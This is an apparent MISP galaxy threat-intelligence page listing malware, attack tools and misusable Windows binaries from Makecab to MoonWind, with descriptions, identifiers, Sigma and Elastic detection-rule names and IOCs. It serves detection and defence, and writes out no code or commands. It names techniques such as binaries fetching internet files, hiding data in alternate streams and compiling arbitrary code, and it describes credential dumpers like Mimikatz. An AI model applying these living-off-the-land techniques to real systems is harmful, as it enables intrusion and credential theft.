tags | ['15f2277a-a17e-4d85-8acd-480bf84f16b4', 'c9c73000-30a5-4a16-8c8b-79169f9c24aa'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Makecab
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to package existing files into a cabinet (.cab) file
Author: Oddvar Moe
Paths: * C:\Windows\System32\makecab.exe * C:\Windows\SysWOW64\makecab.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_susp_alternate_data_streams.yml * Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml * IOC: Makecab retrieving files from Internet * IOC: Makecab storing data into alternate data streams[Makecab.exe - LOLBAS Project]
Internal MISP references
UUID cf7f05a7-4093-4855-b9d9-b93226056aec
which can be used as unique global reference for Makecab
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5123 |
source | Tidal Cyber |
tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Manage-bde
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Script for managing BitLocker
Author: Oddvar Moe
Paths: * C:\Windows\System32\manage-bde.wsf
Resources: * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 * https://twitter.com/bohops/status/980659399495741441 * https://twitter.com/JohnLaTwC/status/1223292479270600706
Detection: * Sigma: proc_creation_win_lolbin_manage_bde.yml * IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations[Manage-bde.wsf - LOLBAS Project]
Internal MISP references
UUID 9b6b705e-55ae-4d9e-9c57-baf1358cc324
which can be used as unique global reference for Manage-bde
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5259 |
source | Tidal Cyber |
tags | ['ff10869f-fed4-4f21-b83a-9939e7381d6e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
MarkiRAT
MarkiRAT is a remote access Trojan (RAT) compiled with Visual Studio that has been used by Ferocious Kitten since at least 2015.[Kaspersky Ferocious Kitten Jun 2021]
Internal MISP references
UUID 40806539-1496-4a64-b740-66f6a1467f40
which can be used as unique global reference for MarkiRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0652 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MASSCAN
According to its GitHub project page, MASSCAN is an "Internet-scale" TCP port scanner. Its usage is similar to that of the popular nmap scanning tool, but it is designed to be operated at a larger scale.[GitHub masscan]
Internal MISP references
UUID 24862f72-a4e0-4a6b-90d7-2465aa86c402
which can be used as unique global reference for MASSCAN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5282 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Matryoshka
Matryoshka is a malware framework used by CopyKittens that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. [ClearSky Wilted Tulip July 2017] [CopyKittens Nov 2015]
Internal MISP references
UUID eeb700ea-2819-46f4-936d-f7592f20dedc
which can be used as unique global reference for Matryoshka
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0167 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mavinject
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by App-v in Windows
Author: Oddvar Moe
Paths: * C:\Windows\System32\mavinject.exe * C:\Windows\SysWOW64\mavinject.exe
Resources: * https://twitter.com/gN3mes1s/status/941315826107510784 * https://twitter.com/Hexcorn/status/776122138063409152 * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Detection: * Sigma: proc_creation_win_lolbin_mavinject_process_injection.yml * IOC: mavinject.exe should not run unless APP-v is in use on the workstation[LOLBAS Mavinject]
Internal MISP references
UUID aa472f81-7673-4545-89f9-1dd43cead4f1
which can be used as unique global reference for Mavinject
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5124 |
source | Tidal Cyber |
tags | ['724c3509-ad5e-46a3-a72c-6f3807b13793', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Maze
Maze ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, Maze operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.[FireEye Maze May 2020][McAfee Maze March 2020][Sophos Maze VM September 2020]
Internal MISP references
UUID 3c206491-45c0-4ff7-9f40-45f9aae4de64
which can be used as unique global reference for Maze
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0449 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '3c3f9078-5d1e-4c29-a5eb-28f237bbd1ad', '1cc90752-70a3-4a17-b370-e1473a212f79', '286918d5-0b48-4655-9118-907b53de0ee0', 'c5c8f954-1bc0-45d5-9a4f-4385d0a720a1', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', '5e7433ad-a894-4489-93bc-41e90da90019', 'a2e000da-8181-4327-bacd-32013dbd3654', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MBR Killer
MBR Killer is a wiper malware observed during a May 2023 data theft and wiper campaign and a 2016 attack on Banco de Chile.[The DFIR Report Truebot June 12 2023]
Internal MISP references
UUID fb879c66-92b1-4a43-8df8-987fc3bc1b1b
which can be used as unique global reference for MBR Killer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5297 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2e621fc5-dea4-4cb9-987e-305845986cd3', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MCMD
MCMD is a remote access tool that provides remote command shell capability used by Dragonfly 2.0.[Secureworks MCMD July 2019]
Internal MISP references
UUID 939cbe39-5b63-4651-b0c0-85ac39cb9f0e
which can be used as unique global reference for MCMD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0500 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
MechaFlounder
MechaFlounder is a python-based remote access tool (RAT) that has been used by APT39. The payload uses a combination of actor developed code and code snippets freely available online in development communities.[Unit 42 MechaFlounder March 2019]
Internal MISP references
UUID 31cbe3c8-be88-4a4f-891d-04c3bb7ed482
which can be used as unique global reference for MechaFlounder
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0459 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MedusaLocker Ransomware
MedusaLocker is a ransomware-as-a-service ("RaaS") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 has typically occurred via exploit of vulnerable Remote Desktop Protocol devices.[HC3 Analyst Note MedusaLocker Ransomware February 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/medusalocker/
Internal MISP references
UUID c9e824b2-554b-4f42-b4c3-48e0a841f589
which can be used as unique global reference for MedusaLocker Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5022 |
source | Tidal Cyber |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
meek
meek is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.
Internal MISP references
UUID 6c3bbcae-3217-43c7-b709-5c54bc7636b1
which can be used as unique global reference for meek
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0175 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
MegaCortex
MegaCortex is ransomware that first appeared in May 2019. [IBM MegaCortex] MegaCortex has mainly targeted industrial organizations. [FireEye Ransomware Disrupt Industrial Production][FireEye Financial Actors Moving into OT]
Internal MISP references
UUID d8a4a817-2914-47b0-867c-ad8eeb7efd10
which can be used as unique global reference for MegaCortex
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0576 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
MEGAsync
A legitimate binary that automates syncing between an endpoint and the MEGA Cloud Drive.[GitHub meganz MEGAsync] Adversaries are known to abuse the tool for data exfiltration purposes.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID eed908e5-a0b3-473f-bca4-0d3197af2168
which can be used as unique global reference for MEGAsync
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5005 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Melcoz
Melcoz is a banking trojan family built from the open source tool Remote Access PC. Melcoz was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.[Securelist Brazilian Banking Malware July 2020]
Internal MISP references
UUID aa844e6b-feda-4928-8c6d-c59f7be88da0
which can be used as unique global reference for Melcoz
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0530 |
source | MITRE |
type | ['malware'] |
MESSAGETAP
MESSAGETAP is a data mining malware family deployed by APT41 into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. [FireEye MESSAGETAP October 2019]
Internal MISP references
UUID 15d7e478-349d-42e6-802d-f16302b98319
which can be used as unique global reference for MESSAGETAP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0443 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
metaMain
metaMain is a backdoor used by Metador to maintain long-term access to compromised machines; it has also been used to decrypt Mafalda into memory.[SentinelLabs Metador Sept 2022][SentinelLabs Metador Technical Appendix Sept 2022]
Internal MISP references
UUID 0a9874bf-4f02-5fab-8ab6-d0f42c6bc71d
which can be used as unique global reference for metaMain
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1059 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Metamorfo
Metamorfo is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.[Medium Metamorfo Apr 2020][ESET Casbaneiro Oct 2019]
Internal MISP references
UUID ca607087-25ad-4a91-af83-608646cccbcb
which can be used as unique global reference for Metamorfo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0455 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Metasploit
The Metasploit Framework is an open-source software project that aids in penetration testing.[Metasploit_Ref] The software is often abused by malicious actors to perform a range of post-exploitation activities.
Internal MISP references
UUID 8d3b1150-8bb3-49a8-8266-7023e3c5e50a
which can be used as unique global reference for Metasploit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5050 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MetaStealer
MetaStealer is an information-stealing malware ("infostealer") designed to harvest passwords, cookies, and other sensitive information from victim systems.[SentinelOne 9 11 2023]
Internal MISP references
UUID e95281ef-a1b1-4da0-b7cc-fa0a9236a4fc
which can be used as unique global reference for MetaStealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS'] |
software_attack_id | S5315 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Meteor
Meteor is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. Meteor is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.[Check Point Meteor Aug 2021]
Internal MISP references
UUID ee07030e-ff50-404b-ad27-ab999fc1a23a
which can be used as unique global reference for Meteor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0688 |
source | MITRE |
type | ['malware'] |
Mftrace
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Trace log generation tool for Media Foundation Tools.
Author: Oddvar Moe
Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 * C:\Program Files (x86)\Windows Kits\10\bin\x86 * C:\Program Files (x86)\Windows Kits\10\bin\x64
Resources: * https://twitter.com/0rbz_/status/988911181422186496
Detection: * Sigma: proc_creation_win_lolbin_mftrace.yml[Mftrace.exe - LOLBAS Project]
Internal MISP references
UUID 4184f447-6f74-487b-be08-6330a6b78992
which can be used as unique global reference for Mftrace
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5224 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Micropsia
Micropsia is a remote access tool written in Delphi.[Talos Micropsia June 2017][Radware Micropsia July 2018]
Internal MISP references
UUID 5879efc1-f122-43ec-a80d-e25aa449594d
which can be used as unique global reference for Micropsia
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0339 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Microsoft.NodejsTools.PressAnyKey
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Part of the NodeJS Visual Studio tools.
Author: mr.d0x
Paths: * C:\Program Files\Microsoft Visual Studio*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe * C:\Program Files (x86)\Microsoft Visual Studio*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
Resources: * https://twitter.com/mrd0x/status/1463526834918854661
Detection: * Sigma: proc_creation_win_renamed_pressanykey.yml * Sigma: proc_creation_win_pressanykey_lolbin_execution.yml[Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project]
Internal MISP references
UUID 370b00ba-1f91-4375-8a4c-5ca67066f4fd
which can be used as unique global reference for Microsoft.NodejsTools.PressAnyKey
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5225 |
source | Tidal Cyber |
tags | ['eb75bfce-e0d6-41b3-a3f0-df34e6e9b476', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Microsoft.Workflow.Compiler
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Author: Conor Richard
Paths: * C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Resources: * https://twitter.com/mattifestation/status/1030445200475185154 * https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb * https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1 * https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1 * https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks * https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/ * https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
Detection: * Sigma: proc_creation_win_lolbin_workflow_compiler.yml * Splunk: suspicious_microsoft_workflow_compiler_usage.yml * Splunk: suspicious_microsoft_workflow_compiler_rename.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations. * IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe * IOC: Presence of "<CompilerInput" in a text file.[Microsoft.Workflow.Compiler.exe - LOLBAS Project]
Internal MISP references
UUID 27bd5fc3-17d9-46fa-84ce-c772736512cd
which can be used as unique global reference for Microsoft.Workflow.Compiler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5125 |
source | Tidal Cyber |
tags | ['b48e3fa8-25b4-42be-97e7-086068a150c5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Milan
Milan is a backdoor implant based on DanBot that was written in Visual C++ and .NET. Milan has been used by HEXANE since at least June 2020.[ClearSky Siamesekitten August 2021][Kaspersky Lyceum October 2021]
Internal MISP references
UUID 57545dbc-c72a-409d-a373-bc35e25160cd
which can be used as unique global reference for Milan
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1015 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mimikatz
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. [Deply Mimikatz] [Adsecurity Mimikatz Guide]
Internal MISP references
UUID b8e7c0b4-49e4-4e8d-9467-b17f305ddf16
which can be used as unique global reference for Mimikatz
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0002 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '5fda51b0-dfda-49bd-8615-524b45d4cd44', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
MimiPenguin
MimiPenguin is a credential dumper, similar to Mimikatz, designed specifically for Linux platforms. [MimiPenguin GitHub May 2017]
Internal MISP references
UUID 42350632-b59a-4cc5-995e-d95d8c608553
which can be used as unique global reference for MimiPenguin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0179 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Miner-C
Miner-C is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. [Softpedia MinerC]
Internal MISP references
UUID c0dea9db-1551-4f6c-8a19-182efc34093a
which can be used as unique global reference for Miner-C
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0133 |
source | MITRE |
type | ['malware'] |
MiniDuke
MiniDuke is malware that was used by APT29 from 2010 to 2015. The MiniDuke toolset consists of multiple downloader and backdoor components. The loader has been used with other MiniDuke components as well as in conjunction with CosmicDuke and PinchDuke. [F-Secure The Dukes]
Internal MISP references
UUID 2bb16809-6bc3-46c3-b28a-39cb49410340
which can be used as unique global reference for MiniDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0051 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MirageFox
MirageFox is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. [APT15 Intezer June 2018]
Internal MISP references
UUID 535f1b97-7a70-4d18-be4e-3a9f74ccf78a
which can be used as unique global reference for MirageFox
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0280 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Misdat
Misdat is a backdoor that was used in Operation Dust Storm from 2010 to 2011.[Cylance Dust Storm]
Internal MISP references
UUID 4048afa2-79c8-4d38-8219-2207adddd884
which can be used as unique global reference for Misdat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0083 |
source | MITRE |
type | ['malware'] |
Mispadu
Mispadu is a banking trojan written in Delphi that was first observed in 2019 and uses a Malware-as-a-Service (MaaS) business model.[ESET Security Mispadu Facebook Ads 2019][SCILabs Malteiro 2021] This malware is operated, managed, and sold by the Malteiro cybercriminal group.[SCILabs Malteiro 2021] Mispadu has mainly been used to target victims in Brazil and Mexico, and has also had confirmed operations throughout Latin America and Europe.[SCILabs Malteiro 2021][SCILabs URSA/Mispadu Evolution 2023][Segurança Informática URSA Sophisticated Loader 2020]
Internal MISP references
UUID 758e5226-6015-5cc7-af4b-20fa35c9bac1
which can be used as unique global reference for Mispadu
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1122 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mis-Type
Mis-Type is a backdoor hybrid that was used in Operation Dust Storm by 2012.[Cylance Dust Storm]
Internal MISP references
UUID fe554d2e-f974-41d6-8e7a-701bd758355d
which can be used as unique global reference for Mis-Type
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0084 |
source | MITRE |
type | ['malware'] |
Mivast
Mivast is a backdoor that has been used by Deep Panda. It was reportedly used in the Anthem breach. [Symantec Black Vine]
Internal MISP references
UUID f603ea32-91c3-4b62-a60f-57670433b080
which can be used as unique global reference for Mivast
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0080 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mmc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Load snap-ins to locally and remotely manage Windows systems
Author: @bohops
Paths: * C:\Windows\System32\mmc.exe * C:\Windows\SysWOW64\mmc.exe
Resources: * https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ * https://offsec.almond.consulting/UAC-bypass-dotnet.html
Detection: * Sigma: proc_creation_win_mmc_susp_child_process.yml * Sigma: file_event_win_uac_bypass_dotnet_profiler.yml[Mmc.exe - LOLBAS Project]
Internal MISP references
UUID 8c7acae2-f844-4e01-86d8-18c3ea90963f
which can be used as unique global reference for Mmc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5126 |
source | Tidal Cyber |
tags | ['f9e6382f-e41e-438e-bd7e-57a57046d9e6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
MobileOrder
MobileOrder is a Trojan intended to compromise Android mobile devices. It has been used by Scarlet Mimic. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 116f913c-0d5e-43d1-ba0d-3a12127af8f6
which can be used as unique global reference for MobileOrder
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0079 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MoleNet
MoleNet is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.[Cybereason Molerats Dec 2020]
Internal MISP references
UUID 7ca5debb-f813-4e06-98f8-d1186552e5d2
which can be used as unique global reference for MoleNet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0553 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mongall
Mongall is a backdoor that has been used since at least 2013, including by Aoqin Dragon.[SentinelOne Aoqin Dragon June 2022]
Internal MISP references
UUID 7f5355b3-e819-4c82-a0fa-b80fda8fd6e6
which can be used as unique global reference for Mongall
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1026 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MoonWind
